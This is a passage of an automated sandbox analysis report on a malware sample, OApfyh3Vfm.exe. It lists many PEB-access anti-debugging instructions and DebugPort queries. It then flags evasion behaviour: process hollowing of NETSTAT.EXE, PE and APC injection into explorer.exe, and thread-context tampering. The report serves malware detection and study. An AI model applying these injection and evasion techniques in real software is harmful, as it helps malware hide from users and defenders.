            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01252581 mov eax, dword ptr fs:[00000030h]2_2_01252581
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01252581 mov eax, dword ptr fs:[00000030h]2_2_01252581
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01222D8A mov eax, dword ptr fs:[00000030h]2_2_01222D8A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01222D8A mov eax, dword ptr fs:[00000030h]2_2_01222D8A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01222D8A mov eax, dword ptr fs:[00000030h]2_2_01222D8A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01222D8A mov eax, dword ptr fs:[00000030h]2_2_01222D8A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01222D8A mov eax, dword ptr fs:[00000030h]2_2_01222D8A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125FD9B mov eax, dword ptr fs:[00000030h]2_2_0125FD9B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125FD9B mov eax, dword ptr fs:[00000030h]2_2_0125FD9B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123D5E0 mov eax, dword ptr fs:[00000030h]2_2_0123D5E0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123D5E0 mov eax, dword ptr fs:[00000030h]2_2_0123D5E0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EFDE2 mov eax, dword ptr fs:[00000030h]2_2_012EFDE2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EFDE2 mov eax, dword ptr fs:[00000030h]2_2_012EFDE2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EFDE2 mov eax, dword ptr fs:[00000030h]2_2_012EFDE2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EFDE2 mov eax, dword ptr fs:[00000030h]2_2_012EFDE2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012D8DF1 mov eax, dword ptr fs:[00000030h]2_2_012D8DF1
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6DC9 mov eax, dword ptr fs:[00000030h]2_2_012A6DC9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6DC9 mov eax, dword ptr fs:[00000030h]2_2_012A6DC9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6DC9 mov eax, dword ptr fs:[00000030h]2_2_012A6DC9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6DC9 mov ecx, dword ptr fs:[00000030h]2_2_012A6DC9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6DC9 mov eax, dword ptr fs:[00000030h]2_2_012A6DC9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6DC9 mov eax, dword ptr fs:[00000030h]2_2_012A6DC9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125BC2C mov eax, dword ptr fs:[00000030h]2_2_0125BC2C
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6C0A mov eax, dword ptr fs:[00000030h]2_2_012A6C0A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6C0A mov eax, dword ptr fs:[00000030h]2_2_012A6C0A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6C0A mov eax, dword ptr fs:[00000030h]2_2_012A6C0A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6C0A mov eax, dword ptr fs:[00000030h]2_2_012A6C0A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F740D mov eax, dword ptr fs:[00000030h]2_2_012F740D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F740D mov eax, dword ptr fs:[00000030h]2_2_012F740D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F740D mov eax, dword ptr fs:[00000030h]2_2_012F740D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124746D mov eax, dword ptr fs:[00000030h]2_2_0124746D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125A44B mov eax, dword ptr fs:[00000030h]2_2_0125A44B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BC450 mov eax, dword ptr fs:[00000030h]2_2_012BC450
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BC450 mov eax, dword ptr fs:[00000030h]2_2_012BC450
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123849B mov eax, dword ptr fs:[00000030h]2_2_0123849B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E14FB mov eax, dword ptr fs:[00000030h]2_2_012E14FB
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6CF0 mov eax, dword ptr fs:[00000030h]2_2_012A6CF0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6CF0 mov eax, dword ptr fs:[00000030h]2_2_012A6CF0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6CF0 mov eax, dword ptr fs:[00000030h]2_2_012A6CF0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F8CD6 mov eax, dword ptr fs:[00000030h]2_2_012F8CD6
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01224F2E mov eax, dword ptr fs:[00000030h]2_2_01224F2E
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01224F2E mov eax, dword ptr fs:[00000030h]2_2_01224F2E
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125E730 mov eax, dword ptr fs:[00000030h]2_2_0125E730
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F070D mov eax, dword ptr fs:[00000030h]2_2_012F070D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F070D mov eax, dword ptr fs:[00000030h]2_2_012F070D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125A70E mov eax, dword ptr fs:[00000030h]2_2_0125A70E
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125A70E mov eax, dword ptr fs:[00000030h]2_2_0125A70E
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124F716 mov eax, dword ptr fs:[00000030h]2_2_0124F716
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BFF10 mov eax, dword ptr fs:[00000030h]2_2_012BFF10
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BFF10 mov eax, dword ptr fs:[00000030h]2_2_012BFF10
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123FF60 mov eax, dword ptr fs:[00000030h]2_2_0123FF60
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F8F6A mov eax, dword ptr fs:[00000030h]2_2_012F8F6A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123EF40 mov eax, dword ptr fs:[00000030h]2_2_0123EF40
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01238794 mov eax, dword ptr fs:[00000030h]2_2_01238794
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A7794 mov eax, dword ptr fs:[00000030h]2_2_012A7794
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A7794 mov eax, dword ptr fs:[00000030h]2_2_012A7794
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A7794 mov eax, dword ptr fs:[00000030h]2_2_012A7794
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012637F5 mov eax, dword ptr fs:[00000030h]2_2_012637F5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122E620 mov eax, dword ptr fs:[00000030h]2_2_0122E620
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012DFE3F mov eax, dword ptr fs:[00000030h]2_2_012DFE3F
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122C600 mov eax, dword ptr fs:[00000030h]2_2_0122C600
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122C600 mov eax, dword ptr fs:[00000030h]2_2_0122C600
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122C600 mov eax, dword ptr fs:[00000030h]2_2_0122C600
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01258E00 mov eax, dword ptr fs:[00000030h]2_2_01258E00
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1608 mov eax, dword ptr fs:[00000030h]2_2_012E1608
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125A61C mov eax, dword ptr fs:[00000030h]2_2_0125A61C
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125A61C mov eax, dword ptr fs:[00000030h]2_2_0125A61C
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123766D mov eax, dword ptr fs:[00000030h]2_2_0123766D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124AE73 mov eax, dword ptr fs:[00000030h]2_2_0124AE73
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124AE73 mov eax, dword ptr fs:[00000030h]2_2_0124AE73
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124AE73 mov eax, dword ptr fs:[00000030h]2_2_0124AE73
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124AE73 mov eax, dword ptr fs:[00000030h]2_2_0124AE73
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124AE73 mov eax, dword ptr fs:[00000030h]2_2_0124AE73
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01237E41 mov eax, dword ptr fs:[00000030h]2_2_01237E41
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01237E41 mov eax, dword ptr fs:[00000030h]2_2_01237E41
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01237E41 mov eax, dword ptr fs:[00000030h]2_2_01237E41
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01237E41 mov eax, dword ptr fs:[00000030h]2_2_01237E41
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01237E41 mov eax, dword ptr fs:[00000030h]2_2_01237E41
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01237E41 mov eax, dword ptr fs:[00000030h]2_2_01237E41
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EAE44 mov eax, dword ptr fs:[00000030h]2_2_012EAE44
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EAE44 mov eax, dword ptr fs:[00000030h]2_2_012EAE44
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F0EA5 mov eax, dword ptr fs:[00000030h]2_2_012F0EA5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F0EA5 mov eax, dword ptr fs:[00000030h]2_2_012F0EA5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F0EA5 mov eax, dword ptr fs:[00000030h]2_2_012F0EA5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A46A7 mov eax, dword ptr fs:[00000030h]2_2_012A46A7
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BFE87 mov eax, dword ptr fs:[00000030h]2_2_012BFE87
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012376E2 mov eax, dword ptr fs:[00000030h]2_2_012376E2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012516E0 mov ecx, dword ptr fs:[00000030h]2_2_012516E0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01268EC7 mov eax, dword ptr fs:[00000030h]2_2_01268EC7
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012536CC mov eax, dword ptr fs:[00000030h]2_2_012536CC
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012DFEC0 mov eax, dword ptr fs:[00000030h]2_2_012DFEC0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F8ED6 mov eax, dword ptr fs:[00000030h]2_2_012F8ED6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D7E41 mov eax, dword ptr fs:[00000030h]8_2_034D7E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D7E41 mov eax, dword ptr fs:[00000030h]8_2_034D7E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D7E41 mov eax, dword ptr fs:[00000030h]8_2_034D7E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D7E41 mov eax, dword ptr fs:[00000030h]8_2_034D7E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D7E41 mov eax, dword ptr fs:[00000030h]8_2_034D7E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358AE44 mov eax, dword ptr fs:[00000030h]8_2_0358AE44
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358AE44 mov eax, dword ptr fs:[00000030h]8_2_0358AE44
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D766D mov eax, dword ptr fs:[00000030h]8_2_034D766D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EAE73 mov eax, dword ptr fs:[00000030h]8_2_034EAE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EAE73 mov eax, dword ptr fs:[00000030h]8_2_034EAE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EAE73 mov eax, dword ptr fs:[00000030h]8_2_034EAE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EAE73 mov eax, dword ptr fs:[00000030h]8_2_034EAE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EAE73 mov eax, dword ptr fs:[00000030h]8_2_034EAE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CC600 mov eax, dword ptr fs:[00000030h]8_2_034CC600
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CC600 mov eax, dword ptr fs:[00000030h]8_2_034CC600
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CC600 mov eax, dword ptr fs:[00000030h]8_2_034CC600
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F8E00 mov eax, dword ptr fs:[00000030h]8_2_034F8E00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03581608 mov eax, dword ptr fs:[00000030h]8_2_03581608
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FA61C mov eax, dword ptr fs:[00000030h]8_2_034FA61C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FA61C mov eax, dword ptr fs:[00000030h]8_2_034FA61C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0357FE3F mov eax, dword ptr fs:[00000030h]8_2_0357FE3F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CE620 mov eax, dword ptr fs:[00000030h]8_2_034CE620
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F36CC mov eax, dword ptr fs:[00000030h]8_2_034F36CC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03598ED6 mov eax, dword ptr fs:[00000030h]8_2_03598ED6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0357FEC0 mov eax, dword ptr fs:[00000030h]8_2_0357FEC0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03508EC7 mov eax, dword ptr fs:[00000030h]8_2_03508EC7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F16E0 mov ecx, dword ptr fs:[00000030h]8_2_034F16E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D76E2 mov eax, dword ptr fs:[00000030h]8_2_034D76E2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0355FE87 mov eax, dword ptr fs:[00000030h]8_2_0355FE87
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035446A7 mov eax, dword ptr fs:[00000030h]8_2_035446A7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03590EA5 mov eax, dword ptr fs:[00000030h]8_2_03590EA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03590EA5 mov eax, dword ptr fs:[00000030h]8_2_03590EA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03590EA5 mov eax, dword ptr fs:[00000030h]8_2_03590EA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03503D43 mov eax, dword ptr fs:[00000030h]8_2_03503D43
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03543540 mov eax, dword ptr fs:[00000030h]8_2_03543540
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034E7D50 mov eax, dword ptr fs:[00000030h]8_2_034E7D50
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EC577 mov eax, dword ptr fs:[00000030h]8_2_034EC577
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EC577 mov eax, dword ptr fs:[00000030h]8_2_034EC577
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358E539 mov eax, dword ptr fs:[00000030h]8_2_0358E539
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0354A537 mov eax, dword ptr fs:[00000030h]8_2_0354A537
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03598D34 mov eax, dword ptr fs:[00000030h]8_2_03598D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F4D3B mov eax, dword ptr fs:[00000030h]8_2_034F4D3B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F4D3B mov eax, dword ptr fs:[00000030h]8_2_034F4D3B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F4D3B mov eax, dword ptr fs:[00000030h]8_2_034F4D3B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CAD30 mov eax, dword ptr fs:[00000030h]8_2_034CAD30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03546DC9 mov eax, dword ptr fs:[00000030h]8_2_03546DC9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03546DC9 mov eax, dword ptr fs:[00000030h]8_2_03546DC9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03546DC9 mov eax, dword ptr fs:[00000030h]8_2_03546DC9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03546DC9 mov ecx, dword ptr fs:[00000030h]8_2_03546DC9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03546DC9 mov eax, dword ptr fs:[00000030h]8_2_03546DC9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03546DC9 mov eax, dword ptr fs:[00000030h]8_2_03546DC9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03578DF1 mov eax, dword ptr fs:[00000030h]8_2_03578DF1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DD5E0 mov eax, dword ptr fs:[00000030h]8_2_034DD5E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DD5E0 mov eax, dword ptr fs:[00000030h]8_2_034DD5E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358FDE2 mov eax, dword ptr fs:[00000030h]8_2_0358FDE2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358FDE2 mov eax, dword ptr fs:[00000030h]8_2_0358FDE2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358FDE2 mov eax, dword ptr fs:[00000030h]8_2_0358FDE2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358FDE2 mov eax, dword ptr fs:[00000030h]8_2_0358FDE2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C2D8A mov eax, dword ptr fs:[00000030h]8_2_034C2D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C2D8A mov eax, dword ptr fs:[00000030h]8_2_034C2D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C2D8A mov eax, dword ptr fs:[00000030h]8_2_034C2D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C2D8A mov eax, dword ptr fs:[00000030h]8_2_034C2D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C2D8A mov eax, dword ptr fs:[00000030h]8_2_034C2D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F2581 mov eax, dword ptr fs:[00000030h]8_2_034F2581
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F2581 mov eax, dword ptr fs:[00000030h]8_2_034F2581
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F2581 mov eax, dword ptr fs:[00000030h]8_2_034F2581
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F2581 mov eax, dword ptr fs:[00000030h]8_2_034F2581
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FFD9B mov eax, dword ptr fs:[00000030h]8_2_034FFD9B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FFD9B mov eax, dword ptr fs:[00000030h]8_2_034FFD9B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F35A1 mov eax, dword ptr fs:[00000030h]8_2_034F35A1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035905AC mov eax, dword ptr fs:[00000030h]8_2_035905AC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035905AC mov eax, dword ptr fs:[00000030h]8_2_035905AC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F1DB5 mov eax, dword ptr fs:[00000030h]8_2_034F1DB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F1DB5 mov eax, dword ptr fs:[00000030h]8_2_034F1DB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F1DB5 mov eax, dword ptr fs:[00000030h]8_2_034F1DB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FA44B mov eax, dword ptr fs:[00000030h]8_2_034FA44B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0355C450 mov eax, dword ptr fs:[00000030h]8_2_0355C450
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Code function: 2_2_00409B40 LdrLoadDll
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 830000
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
            Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Memory written: C:\Users\user\Desktop\OApfyh3Vfm.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Thread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe Thread register set: target process: 3424
